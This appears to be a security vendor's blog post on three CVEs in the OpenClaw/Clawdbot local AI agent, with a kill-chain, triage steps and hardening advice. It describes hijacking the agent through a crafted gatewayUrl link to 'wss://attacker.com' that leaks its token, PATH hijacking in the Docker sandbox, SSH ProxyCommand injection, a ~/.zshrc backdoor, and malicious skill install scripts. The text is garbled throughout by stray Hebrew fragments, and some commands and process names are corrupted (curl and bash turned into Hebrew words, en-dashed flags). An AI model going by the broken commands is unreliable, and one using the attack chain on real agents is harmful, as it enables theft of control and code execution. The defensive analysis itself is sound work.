RCE in Clawdbot: The CVEs, the Real Kill-Chains, and the Fixes You Can Prove

When an AI agent runs locally on your machine, “Remote Code Execution” (RCE) undergoes a dangerous paradigm shift. It is no longer an abstract risk involving a web server in a DMZ; it is a direct, authenticated shell on a developer’s workstation.

Recent disclosures regarding Clawdbot (interchangeably referred to as OpenClaw או Moltbot) have highlighted a critical intersection between the convenience of “Agentic AI” and the rigid reality of infrastructure security. While the mainstream tech press focuses on the novelty of “AI hacking,” for security engineers, this incident is a masterclass in classic logic flaws re-emerging in new architectures: unsafe WebSocket handshakes, unescaped paths in container sandboxes, and argument injection vectors.

This is not a hype piece. This is a deep technical breakdown of the three CVEs you need to prioritize, exactly how they chain together to form a kill-chain, and how to verify your remediation with forensic certainty.

1. What “Clawdbot” Refers to in 2026 (The Naming Risk)

Before analyzing the exploits, we must clarify the terminology. Inconsistent naming is a primary cause of failed vulnerability scans.

• The Project: The open-source project is widely known today as OpenClaw. However, due to a recent rebrand and fork history, legacy documentation, package managers (like Homebrew or pip), and even NVD records frequently reference Clawdbot או Moltbot.
• The Architecture: Regardless of the name, the risk surface is identical. This is a local-first personal AI assistant. Unlike a passive LLM (like ChatGPT in a browser), OpenClaw/Clawdbot is designed to integrate deep into your OS. It has permissions to read files, write code, execute shell commands, and manage Docker containers.
• The “RCE” Context: In this specific scenario, RCE does not necessarily mean “buffer overflow.” It means an attacker gaining the ability to drive the agent’s pre-authorized tools (Shell, Docker, SSH) or injecting commands into the agent’s control plane. If the agent is authorized to run rm -rf, and you trick the agent, you have achieved RCE.

2. The CVEs You Must Put in the Incident Ticket

The following three vulnerabilities form the core of the recent advisory cluster. You must ensure your remediation plan addresses the specific version cutoff: 2026.1.29.

2.1 CVE-2026-25253 — Gateway Url + Auto WebSocket Connect + Token Leakage

Severity: Critical (CVSS 9.1)

רכיב: Control Plane / WebSocket Handshake

Fixed Version: 2026.1.29

According to NVD data, this vulnerability exists because the application accepts a gatewayUrl via a query string parameter and automatically initiates a WebSocket connection to that URL without user confirmation.

The Technical Flaw:

The agent’s local web server listens for configuration parameters via URL. If a user visits a link like http://localhost:port/?gatewayUrl=wss://attacker.com, the agent immediately initiates a connection to attacker.com.

Crucially, during this WebSocket handshake, the agent transmits its authentication token to authorize the session.

Security Engineer Interpretation:

בעוד חדשות ההאקרים frames this as “token exfiltration,” in an agentic architecture, a stolen token is effectively RCE. This token represents the user’s authority. Once an attacker possesses it, they can connect to the agent’s legitimate gateway and issue commands as if they were the user sitting at the keyboard. This bypasses all “human-in-the-loop” controls that rely on session validity.

2.2 CVE-2026-24763 — Docker Sandbox Command Injection via PATH Handling

Severity: גבוה

רכיב: Docker Execution Provider

Fixed Version: 2026.1.29

This vulnerability demonstrates why “sandboxing” is difficult. The flaw lies in unsafe handling of the system PATH environment variable within the Docker execution mechanism.

The Technical Flaw:

When the agent constructs the command to run inside a Docker container, it allows the user (or the attacker controlling the agent) to specify environment variables. NVD reports that the input validation for the PATH variable was insufficient.

An authenticated attacker can set PATH to point to a directory they control (or a temporary location where they have written a payload). When the agent attempts to run a “safe” tool (like פייתון או grep), the OS looks in the malicious PATH first and executes the attacker’s binary instead.

השפעה:

This allows an attacker to “break out” of the intended logic. Even if the agent is only supposed to run Python scripts, this vulnerability allows the execution of arbitrary binaries present in the container or mounted volumes. This maps to CWE-78 (OS Command Injection).

2.3 CVE-2026-25157 — Remote/SSH Mode Command Injection

Severity: Medium/High (Context Dependent)

רכיב: Remote/SSH Mode (specifically macOS menubar app)

Fixed Version: 2026.1.29

This vulnerability is scoped to the “Remote” functionality, where the agent connects to remote servers via SSH to perform tasks.

The Technical Flaw:

1. Unescaped Project Path: An error path in a shell script failed to properly escape the project path string. If an attacker can influence the project path name, they can inject shell commands that execute when the error handler triggers.
2. Argument Injection: The SSH invocation did not use the - delimiter to separate options from positional arguments. If an attacker supplies a hostname looking like oProxyCommand=..., SSH interprets it as a configuration flag rather than a target.

השפעה:

This allows execution of commands on the remote host the agent is connecting to, or on the מקומי host initiating the connection, depending on the specific vector used.

Summary Table

פריט	What it is	תנאים מוקדמים	Impact (Defender View)	גרסה קבועה
CVE-2026-25253	gatewayUrl triggers auto WS connect + token send	User interacts with crafted link; Vulnerable build running	Entry Point: Token theft → gateway compromise; leads to control of agent logic.	2026.1.29 (The Hacker News)
CVE-2026-24763	Command injection in Docker sandbox via PATH	Authenticated user (or stolen token) can control env vars	Escalation: Command execution inside container context; escape possible via mounts.	2026.1.29 (NVD)
CVE-2026-25157	OS command injection in Remote/SSH mode	Attacker influences SSH settings/target or project path	תנועה לרוחב: Code exec on local or remote host; scoped to macOS app.	2026.1.29 (GitHub)

3. The “RCE Kill-Chain” Engineers Actually See

To understand the risk, we must look past individual CVEs and view the “Kill-Chain.” This is how a remote attacker turns a link click into a shell on your laptop.

Phase 1: Infiltration (The Setup)

The attacker hosts a malicious WebSocket server. They craft a URL targeting the local agent (e.g., http://127.0.0.1:5500/?gatewayUrl=...). They send this link to a developer via email, Slack, or a “Helpful Code Snippet” forum post.

• מנגנון: CVE-2026-25253 (Parameter Injection).

Phase 2: Compromise (The Handshake)

The victim clicks the link. The local OpenClaw agent sees the gatewayUrl param and obediently switches its upstream connection to the attacker’s server. During the handshake, it sends the Auth-Token.

• מנגנון: Token Exfiltration.
• תוצאה: The attacker now has a persistent session ID valid for the agent’s control plane.

Phase 3: Weaponization (The Instructions)

The attacker connects to the victim’s agent using the legitimate API and the stolen token. They are now “The User.” They instruct the agent to “Analyze this project,” passing a configuration that defines a malicious PATH environment variable.

• מנגנון: Abuse of legitimate agent features + CVE-2026-24763 (Docker Injection).

Phase 4: Execution (The Shell)

The agent spins up the Docker sandbox to perform the task. Because of the poisoned PATH, when the agent tries to run a standard analysis tool, it executes the attacker’s script instead.

• תוצאה: Arbitrary code execution within the container. If the container has the host filesystem mounted (common in dev agents), the attacker writes a persistence backdoor to ~/.zshrc.

4. Triage Checklist: Determine Exposure in 15 Minutes

Do not rely on generic vulnerability scanners that may not yet have signatures for “Moltbot.” Use this manual triage process.

4.1 Identify Version and Build Provenance

You need to check the binary version. Remember the cutoff: Prior to 2026.1.29 is vulnerable.

באש

`# safe to run in terminal

Check for OpenClaw, Clawdbot, or Moltbot binaries

if command -v openclaw &> /dev/null; then openclaw –version elif command -v clawdbot &> /dev/null; then clawdbot –version elif command -v moltbot &> /dev/null; then moltbot –version else echo “Binary not found in PATH. Check UI or /Applications.” fi`

למה: NVD explicitly flags versions before the Jan 29, 2026 release as critical.

4.2 Find Exposed Control Surfaces

Is the agent listening only on localhost, or is it exposed to the LAN?

• לרוץ lsof -i -P | grep -E "openclaw|clawdbot"
• חפש :* או 0.0.0.0:* listens.
• סיכון: If exposed to the LAN, an attacker does not need you to click a link; they can trigger CVE-2026-25253 directly if they are on the same Wi-Fi. (Tenable® warns significantly about misconfigured listening interfaces).

4.3 Review Execution Primitives

Check the config.toml או settings.json for the agent.

• Auto-Approve: חפש auto_approve = true or lists containing ["shell", "bash", "cmd"]. This setting removes the “Human-in-the-loop” barrier, turning the agent into an automated RCE bot.
• Docker Socket: Verify if the docker socket /var/run/docker.sock is mounted into the agent’s sandbox. This facilitates container escapes.

5. Remediation Playbook: Patch First, Then Harden

5.1 Non-Negotiable: Upgrade to a Fixed Build

There is no configuration workaround for the WebSocket token leak. You must upgrade the binary.

• פעולה: עדכון ל v2026.1.29 or later immediately. This version removes the auto-connect logic for gatewayUrl and sanitizes the PATH handling.

5.2 Hardening Patterns that Survive Future CVEs

Patching fixes the bug; hardening fixes the architecture.

1. Connection Target Allowlisting: Configure the agent to רק allow WebSocket connections to your enterprise gateway or known-good URLs.
   • Control: In the new config, look for allowed_gateways = ["wss://api.mycorp.com"]. This neutralizes the impact of any future redirection bugs.
2. Privilege Minimization:
   • User Context: Never run the agent as שורש or with sudo cached credentials. Create a dedicated user clawdbot-user with restricted read/write permissions.
   • Network Egress: Use a host-based firewall (Little Snitch, LuLu, or iptables) to block the agent from initiating outbound connections to unknown IPs.
3. Execution Gating:
   • Disable Auto-Approve: For any tool that modifies the filesystem or executes code, require explicit UI confirmation.
   • Isolate Docker: Ensure the Docker sandbox does not mount the entire $HOME directory. Scope it to specific project folders only.

5.3 Supply-Chain Reality: Skills as an RCE Multiplier

The Verge recently reported on the “Malicious Skills” marketplace. An agent is only as safe as the tools you give it.

• סיכון: You patch the agent, but then install a community “PDF Summarizer” skill. This skill contains a malicious post-install script.
• הגנה: Treat skills like unvetted npm packages. Audit the code of any third-party skill before installation. If the skill asks for “Shell Execution” permission, deny it unless strictly necessary.

6. Verification: How to Prove You’re Fixed

For audit logs and post-mortems, you need evidence that the vulnerability is closed.

Post-Upgrade Verification

1. Version Output: Screenshot the CLI output showing version 2026.1.29.
2. Gateway Test: Attempt to launch the agent with the malicious query string: openclaw --gatewayUrl "wss://test.com".
   • Success Criteria: The agent should either ignore the parameter or prompt the user for confirmation (depending on the specific patch implementation), but it must not auto-connect.

Telemetry to Monitor

Add these signals to your EDR/SIEM:

• Token Use Anomalies: A valid user token being used from a new IP address or user-agent (indicating theft).
• Gateway Changes: Logs showing the agent switching its upstream WebSocket target.
• Process Spawning: openclaw spawning sh, לנזוף, או תלתל commands that deviate from known patterns.

Evidence Bundle Checklist

• [ ] Screenshot of openclaw --version
• [ ] Copy of config.toml showing auto_approve disabled.
• [ ] Log snippet showing a rejected connection attempt to an untrusted gateway.

At Penligent, we approach agent security through defensive validation. We don’t just scan code; we validate the runtime posture of AI agents.

Our platform performs repeatable checks for exposed control surfaces (like the WebSocket gateway) and validates configuration weaknesses (like auto-approve settings) without shipping exploit code. We help security teams move from “guessing we are safe” to having a Proof-of-Remediation report. If you are deploying agents like Clawdbot in production, review our guide on OpenClaw AI Security Engineering for a defensive architecture reference.

7. Appendix: Quick FAQ + Executive Summary

Q: Is this only an OpenClaw issue or also ‘Clawdbot/Moltbot’?

A: The naming is inconsistent due to forks. The CVEs (CVE-2026-25253, etc.) officially reference OpenClaw, but they apply to the codebase formerly known as Clawdbot and Moltbot. If your binary is older than Jan 30, 2026, it is vulnerable regardless of the name. (Source: NVD).

Q: Do I need to be internet-exposed to be at risk?

A: No. The most critical vector (Token Theft) relies on a “Cross-Site” style attack. If you click a link in your browser, the browser connects to your local agent. You do not need to have ports open to the public internet to be exploited.

Q: What should enterprises ban by policy?

A:

1. Untrusted Skills: Ban skills from unverified community repos.
2. Auto-Approve: Ban the use of “Auto-Approve” for shell execution in corporate environments.
3. Root Access: Ensure agents are not running with elevated privileges.

הפניות

• [NVD] CVE-2026-25253 Description and References.
• [חדשות ההאקרים] Patch version and framing of the bug’s impact.
• [NVD] CVE-2026-24763 Command Injection description and fixed version.
• [GitHub Advisory] CVE-2026-25157 Scope + Impacted Components List.
• [Tenable] Summary of Clawdbot/Moltbot/OpenClaw risk categories.
• [The Verge] Malicious skills marketplace findings (Supply-chain angle).
• [Penligent] Clawdbot Shodan Post-Mortem & Defense Architecture.
• [Penligent] OpenClaw AI Vulnerability (RCE + Indirect Injection).
• [Penligent] OpenClaw AI Security Engineering Overview.
• [Penligent] Cloud-Native Security Practices in Production.